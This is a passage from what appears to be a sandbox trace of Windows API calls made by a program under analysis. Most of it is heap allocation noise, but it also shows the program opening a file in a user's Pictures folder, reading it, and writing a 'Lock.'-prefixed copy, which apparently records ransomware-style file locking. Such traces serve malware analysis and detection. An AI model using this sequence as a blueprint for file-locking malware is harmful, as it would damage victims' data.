hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0250.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0250.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0250.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0250.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0250.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0250.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0250.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0250.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0250.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0250.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0250.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0250.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0250.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0250.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0250.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0250.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0250.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0250.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0250.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0250.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0250.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0250.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0250.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0250.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0250.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0250.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0250.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0250.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0250.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0250.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0250.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0250.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0250.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0250.014] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/MYUszCBAPCzmXXDSG.png" (normalized: "c:\\users\\fd1hvy\\pictures\\myuszcbapczmxxdsg.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0250.060] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.060] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0250.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0250.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0250.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0250.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0250.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0250.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0250.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0250.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0250.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0250.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0250.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0250.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0250.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0250.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0250.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0250.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0250.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0250.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0250.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0250.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0250.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0250.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0250.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0250.061] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0250.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0250.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0250.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0250.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0250.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0250.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.063] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.MYUszCBAPCzmXXDSG.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.myuszcbapczmxxdsg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0250.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0250.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0250.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0250.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0250.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0250.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0250.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0250.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0250.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0250.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0250.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0250.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0250.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0250.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0250.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0250.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0250.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0250.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0250.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0250.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0250.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0250.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0250.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0250.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0250.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0250.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0250.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe55020 [0250.066] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0250.066] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x6f77, lpOverlapped=0x0) returned 1 [0250.068] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0250.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0250.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0250.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0250.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6f77) returned 0x3bf0050 [0250.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe55020 | out: hHeap=0x970000) returned 1 [0250.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0250.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0250.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0250.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0250.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0250.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6f77) returned 0x2f14010 [0250.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0250.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0250.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0250.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0250.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0250.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6f77) returned 0x3bf0050 [0250.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0250.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0250.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0250.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0250.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0250.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0250.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0250.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 